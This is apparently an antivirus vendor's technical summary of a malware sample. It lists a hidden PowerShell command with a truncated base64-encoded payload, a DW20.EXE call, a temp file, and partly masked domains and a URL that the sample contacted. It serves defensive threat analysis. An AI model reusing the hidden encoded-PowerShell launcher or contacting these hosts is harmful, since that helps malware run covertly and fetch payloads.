Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABGAHcAdQBvAHEAZwBpAHIAaQBhAD0AJwBWAGgAdQBzAHQAZgBlAGMAdwAnADsAJABWAHAAZgBhAGkAeAB2AHcAZwBrAHYAdwBsACAAPQAgACcANQA3ACcAOwAkAEUAawB6AHEAdgBrAHQAeAB5AGgAcgBvAD0AJwBRAHMAbgB4AHgAYQB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1476
- %TEMP%\947908.cvr
- 'bl##.##ourkarite.com':80
- http://bl##.##ourkarite.com/et0a/ZnG6LPQDOd/
- DNS ASK za#####iyehcenter.com
- DNS ASK ne#####.#odernformslights.com
- DNS ASK du####ngcaihui.com
- DNS ASK bl##.##ourkarite.com
- DNS ASK kp###karite.com
- DNS ASK he####huoctot.com